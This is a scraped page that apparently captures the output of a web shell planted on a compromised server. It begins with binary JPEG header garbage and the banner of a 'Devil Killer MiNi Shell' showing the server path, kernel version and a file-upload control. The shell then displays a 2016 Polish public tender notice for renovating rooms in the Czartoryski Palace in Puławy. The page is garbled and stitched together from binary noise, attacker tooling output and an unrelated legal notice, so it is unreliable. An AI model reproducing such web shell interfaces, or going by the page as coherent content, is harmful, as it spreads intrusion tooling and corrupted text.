JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160414/89828-N-2016.html

<p class="kh_header"><b>Puławy: Remont pomieszczeń w środkowej części lewego skrzydła  Pałacu Czartoryskich w Puławach</b><br>
<b>Numer ogłoszenia: 89828 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Uprawy Nawożenia i Gleboznawstwa - Państwowy Instytut Badawczy , ul. Czartoryskich 8, 24-100 Puławy, woj. lubelskie, tel. 81 47 86 700, faks 81 47 86 900.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iung.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń w środkowej części lewego skrzydła  Pałacu Czartoryskich w Puławach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamierzenia jest: wykonanie  remontu części środkowej lewego skrzydła pałacu (parter i piętro) dla potrzeb Zakładu Biogospodarki i Analiz Systemowych. Pomieszczenia pałacowe, które będą podlegały remontowi były użytkowane jako pomieszczenia laboratoryjne i biurowe obecne nie są użytkowane. Zostały one opuszczone przez Zakłady, które  przeniesiono do nowego budynku laboratoryjnego. Objęta remontem część lewego skrzydła uległa w okresie II wojny światowej dużemu zniszczeniu ( spalona drewniana konstrukcja dachu oraz stropu nad I piętrem). Stropy nad  I piętrem odbudowano jako stropy typu Kleina. Tynki w pomieszczeniach uległy również znacznej degradacji, w związku z powyższym zostały praktycznie wykonane od nowa.  Budynek wyposażony jest  w wewnętrzną instalację: elektryczną,  internetową, wodno-kanalizacyjną,  ciepłej wody oraz instalację centralnego ogrzewania. Wysokość pomieszczeń - 3,90 m.  
Remont nie naruszy architektury i konstrukcji budynku pałacowego.
1) Remont dotyczy wykonania robót wewnętrznych i będzie polegał na:
-  likwidacji stanowisk laboratoryjnych wraz ze zlewami,
-  skucie ze ścian okładzin z płytek glazury
 -  gruntowaniu podłoży preparatami np. Ceresit CT 17
 - uzupełnienie uszkodzonych tynków oraz tynków w miejscach po skutej glazurze,
-  przetarciu tynków na ścianach i stropach,
 -  zeskrobaniu i zmyciu  starej farby,
  - wykonaniu okładziny ściennej z płyt gipsowo-kartonowych gr. 12,5 mm (suche tynki)  pojedyncze, na    zaprawie, bez pasków,
 -   pomalowaniu ścian i sufitów emulsją akrylową,
 -   malowaniu grzejników  i rur wod-kan,
-   oczyszczeniu, remoncie stolarki drzwiowej wraz z wymianą okuć 
        i  zamków,
-  malowanie stolarki drzwiowej
 -   malowanie stolarki okiennej i parapetów okiennych farbą akrylową,
 -   renowacja istniejących parkietów,
2) Modernizacji instalacji internetowej, pod potrzeby użytkowników,

3) Modernizacji  bezpiecznej instalacji elektrycznej do zasilenia urządzeń komputerowych (instalacja zabezpieczona przed przepięciami,
      4) Modernizacja instalacji elektrycznej oświetleniowej,
      5) Częściowa modernizacja instalacji elektrycznej
Uwagi:
Zamawiający zaleca aby Wykonawcy ubiegający się o wykonanie zamówienia przeprowadzili  wizję lokalną terenu, celem dokładnego zapoznania się z przedmiotem zamówienia i ujęcia w ofercie ewentualnych dodatkowych prac wyżej nie przewidzianych, a których  przeprowadzenie zapewni prawidłowe wykonania przedmiotu zamówienia.

2. Przedmiot zamówienia na ww. roboty budowlane został opisany, zgodnie z art. 31 ust. 1 ustawy Pzp, za pomocą dokumentacji projektowej wykonawczej,  zgodnie z PN-EN i WTWiOR oraz specyfikacją techniczną wykonania i odbioru robót budowlanych.

2.1. Szczegółowy zakres rzeczowy zawiera dokumentacja projektowa składająca się z:

1)	Dokumentacji rysunkowej i fotograficznej zgodnie z wykazem stanowiącym załącznik nr 10 do SIWZ,
2)	Opisu przedmiotu zamówienia zgodnie z wykazem stanowiącym załącznik nr 9 do SIWZ,
3)	Inwestorskiego przedmiar robót zgodnie z wykazem stanowiącym załącznik nr 2a- 2b do SIWZ,

2.2. Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:

2.2.1 Przedmiot zamówienia należy wykonać z zastosowaniem materiałów, urządzeń i systemów opisanych w dokumentacji określonej w pkt.2.1, Polskich Norm PN i PN-EN, Warunków Technicznych Wykonania i Odbioru Robót wyd. ITB. W przypadku wskazania w dokumentacji projektowej nazw własnych producentów, urządzeń, systemów, produktów i materiałów, Zamawiający dopuszcza składanie ofert równoważnych zgodnie z art. 30 ust. 4 ustawy Pzp. Użyte nazwy własne nie są wiążące dla Wykonawców i należy je traktować jako materiały przykładowe do określenia standardów jakości oraz parametrów i wymogów technicznych opisu przedmiotu zamówienia. Zamawiający dopuszcza zastosowanie urządzeń, systemów, produktów i materiałów o parametrach nie gorszych niż wskazane przez Zamawiającego w dokumentacji projektowej. Wykonawca, który powołuje się na rozwiązania równoważne, aniżeli opisane przez Zamawiającego, jest obowiązany wykazać, że oferowane urządzenia, systemy, produkty i materiały spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Pzp).

2.2.2  Zamawiający wyraża zgodę na udział Podwykonawców w realizacji zamówienia. W przypadku zamiaru powierzenia określonej części robót budowlanych Podwykonawcy/om, Wykonawca zobowiązany jest wpisać   części zamówienia.
2.2.3  Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za roboty budowlane, usługi i dostawy wykonane  przez Podwykonawców.
2.2.4 Odpowiedzialność Wykonawcy za działania lub zaniechania Podwykonawców nie wyłącza osobistej odpowiedzialności Podwykonawców, która nie może być w jakiejkolwiek formie zniesiona lub ograniczona.
2.2.5 Wykonawca udzieli Zamawiającemu gwarancji jakości i rękojmi (gwarancja właściwego usunięcia wad i usterek) na przedmiot Umowy. Okres gwarancji jakości  i rękojmi wynosi co najmniej 24 miesięcy licząc od daty odbioru końcowego przedmiotu Umowy. W przypadku, gdy dostawcy wyrobów i urządzeń będących elementami przedmiotu zamówienia udzielą dłuższego okresu gwarancji niż 24 miesięcy, obowiązuje okres gwarancji dostawców. 
2.3    Zamawiający ustala kosztorysową formę wynagrodzenia Wykonawcy.
2.4    Przy wykonywaniu przedmiotu zamówienia należy stosować wyroby budowlane wprowadzone do obrotu zgodnie z przepisami odrębnymi (art.10 Ustawy z dnia 7 lipca 1994 r. Prawo budowlane, (Dz. U. z 2013, poz. 1409z późn. zm. ). Dokumenty potwierdzające wprowadzenie do obrotu, należy przedstawić do wglądu w trakcie realizacji zamówienia, a ich komplet Wykonawca przekaże Zamawiającemu przed odbiorem końcowym.
2.4   Prace będą prowadzone w obiektach zabytkowych i winny być wykonywane zgodnie z Rozporządzeniem Ministra Kultury z dnia 9 czerwca ( dz. U. nr 150, poz.1579 z późn. zm. ) w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych oraz ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami( Dz. U. Nr 162 poz. 1568,oraz z dnia 2004 r. nr 96, poz. 959 z późn. zm.) a także zgodnie z ustawa z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. Nr 243 poz. 1623z późn zm.  z późn zm. ).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.13.00-1, 45.26.25.00-6, 45.31.12.00-2, 45.33.22.22-9, 45.33.12.20-4, 45.40.00.00-1, 45.45.30.00-7, 45.44.00.00-3, 45.41.00.00-4, 45.45.12.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie powyższego warunku poprzez złożenie oświadczenia (wzór załącznik nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie powyższego warunku poprzez złożenie oświadczenia (wzór załącznik nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie powyższego warunku poprzez złożenie oświadczenia (wzór załącznik nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował zespołem osób, które będą uczestniczyć w wykonaniu zamówienia, a w szczególności: osobą z doświadczeniem w pracach przy obiektach zabytkowych oraz osobą posiadającą ważne uprawnienia do kierowania robotami budowlanymi o specjalności: konstrukcyjno-budowlanej zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane t.j. (Dz.U. z 2013 r., poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006r., Nr 83, poz. 578, z późn.zm.) oraz 

Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów Prawo budowlane t.j. (Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz ustawy o zasadach uznania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008r., Nr 63, poz. 394 z późn. zm.). Wówczas Wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym i Wykonawcą, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez Zamawiającego. Wykonawca zatrudniając tłumacza winien wziąć pod uwagę, iż z uwagi na złożony zakres przedmiotu zamówienia tłumacz ten winien być biegłym w tłumaczeniu zagadnień technicznych, ekonomicznych i prawnych. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie powyższego warunku poprzez złożenie oświadczenia (wzór załącznik nr 4 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz oferty - zgodnie z załącznikiem nr 1 do SIWZ, 2. Wypełniony kosztorys ofertowy ( szczegółowy wraz z tabelą elementów scalonych) - oryginał dokumentu - opracowany w oparciu o inwestorski przedmiar robót - wg załącznika Nr 2a- 2b,  , 3. upoważnienie (pełnomocnictwo) do podpisania oferty powinno być dołączone do oferty, o ile nie wynika ono z dokumentów dołączonych do oferty. Upoważnienie (pełnomocnictwo) powinno być złożone w formie oryginału albo notarialnie poświadczonej kopii. 4. Oświadczenie w trybie art. 22 ust. 1 Ustawy Pzp ( załącznik nr 4) , 5. Oświadczenie o braku podstaw do wykluczenia art. 24 ust. 1 Ustawy Pzp ( załącznik nr 5), 6.informacja wykonawcy o braku przynależności do grupy kapitałowej, bądź o przynależności ( załącznik nr 6)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji i rękoimi - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.2 Zamawiający przewiduje zmiany istotnych postanowień  zawartej Umowy (art. 144 Pzp)  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy polegające na: 
16.2.1 Zmianie rozwiązań technicznych wskazanych w dokumentacji projektowej wykonania zamówienia:              
16.2.1.1 Na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie prowadzenia inwestycji, mogą być dokonywane zmiany technologii wykonywania elementów robót. Dopuszcza się je tylko w przypadku, gdy proponowane przez niego rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje opis przedmiotu zamówienia wraz z załącznikami, a Wykonawca nie będzie żądał zwiększenia wynagrodzenia za wykonywane roboty. W tym przypadku Wykonawca przedstawia rozwiązanie zamienne zawierające zamienny opis wraz z rysunkami. Zmiany wymagają uzgodnienia z Inspektorem Nadzoru i akceptacji Zamawiającego. Powyższe zmiany nie mogą zmieniać terminu zakończenia robót.
16.2.1.2 W przypadku, gdy z punktu widzenia Zamawiającego zachodzi uzasadniona potrzeba zmiany rozwiązań technicznych, których nie można było przewidzieć na etapie postępowania o udzielenie zamówienia, Inwestor zleca wykonanie, a Wykonawca sporządza protokół konieczności wraz z wyceną, i przedkłada go do zatwierdzenia Zamawiającemu. Zmiany techniczne mogą powodować zmianę  terminu zakończenia zamówienia podstawowego. 
16.2.2 Z mianie terminu zakończenia zamówienia podstawowego:
16.2.2.1 Spowodowane epidemią, stwierdzoną przez uprawnione do tego organy lokalne lub państwowe.
16.2.2.2 Spowodowane siłą wyższą.
Za siłę wyższą przyjmuje się zdarzenie, które pozostaje poza kontrolą strony Umowy, zdarzenie zewnętrzne, któremu nie można zapobiec oraz które wyróżnia się nadzwyczajnym charakterem np. gwałtowne zjawiska przyrodnicze o charakterze katastrof oraz nadzwyczajne zaburzenia życia społecznego, w szczególności: 
a) wprowadzenie stanu wojennego na terenie obejmującym również miejsce wykonywania robót budowlanych, akty terroryzmu,
b) katastrofy żywiołowe, w szczególności huragany, trzęsienia ziemi, powódź, intensywne opady deszczu i  śniegu lub ekstremalnie wysokie temperatury.
c) strajk (z wyłączeniem strajku wewnętrznego w firmie Wykonawcy),  a posiadający wpływ na realizację przedmiotu Umowy,
16.2.2.3 Spowodowane wystąpieniem malatury zabytkowej i odkryć o znaczeniu  historycznym, bądź wystąpieniem niewybuchów, niewypałów uniemożliwiających prowadzenie robót; wszystkie przedmioty o znaczeniu historycznym lub też przedstawiające znaczną wartość,  odkryte na terenie budowy, będą przekazane pod opiekę konserwatora zabytków. Wykonawca niezwłocznie zabezpieczy znaleziska przed osobami trzecimi. Wykonawca niezwłocznie powiadomi Inspektora Nadzoru o takich odkryciach i wykona jego polecenia, co do obchodzenia się z nimi i dalszego trybu postępowania. 
16.2.2.4 Spowodowane wydaniem decyzji administracyjnej zakazującej kontynuowania robót budowlanych z przyczyn, za które Wykonawca nie ponosi odpowiedzialności.
16.2.2.5 Zmianie dotyczącej zakresu robót, jeżeli wystąpią nieprzewidziane kolizje z robotami prowadzonymi równolegle przez inne podmioty. W takim przypadku zmiany w Umowie zostaną ograniczone do zmian powodujących uniknięcie lub usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii, lokalizacji wbudowywanych urządzeń oraz zmiana terminu.
16.2.2.6 W przypadku wystąpienia robót dodatkowych lub zamiennych niezależnych od Wykonawcy wpływających na zakończenie terminu wykonania robót
16.2.3 Zmianie osób przewidzianych do realizacji zamówienia przez strony w przypadku nieprzewidzianych zdarzeń losowych m.in. takich jak śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków, nienależyte wykonywanie obowiązków, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje jak osoby wskazane w Umowie.
16.2.4 Zmianie Podwykonawców. W przypadku zmiany Podwykonawcy(ów) stosuje się tryb określony w art. 6471 Kc,
16.2.5 Dopuszcza się  możliwość dokonania zmian w zawartej Umowie, za zgodą obydwu stron, w przypadku wystąpienia innych, nieprzewidzianych powyżej okoliczności, których nie można było przewidzieć na etapie postępowania o udzielenie zamówienia publicznego, a ich wystąpienie będzie uzasadnione w sposób obiektywny i będą one korzystne dla Zamawiającego.
16.2.6 Wystąpienia robót dodatkowych lub zamiennych niezależnych od Wykonawcy wpływających na zakończenie terminu wykonania robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iung.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Uprawy Nawożenia i Gleboznawstwa - Państwowy Instytut Badawczy w Puławach ul. Czartoryskich 8, 24-100 Puławy, pokój do spraw zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2016 godzina 09:00, miejsce: Instytut Uprawy Nawożenia i Gleboznawstwa - Państwowy Instytut Badawczy w Puławach ul. Czartoryskich 8, 24-100 Puławy, Sekretariat Instytutu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





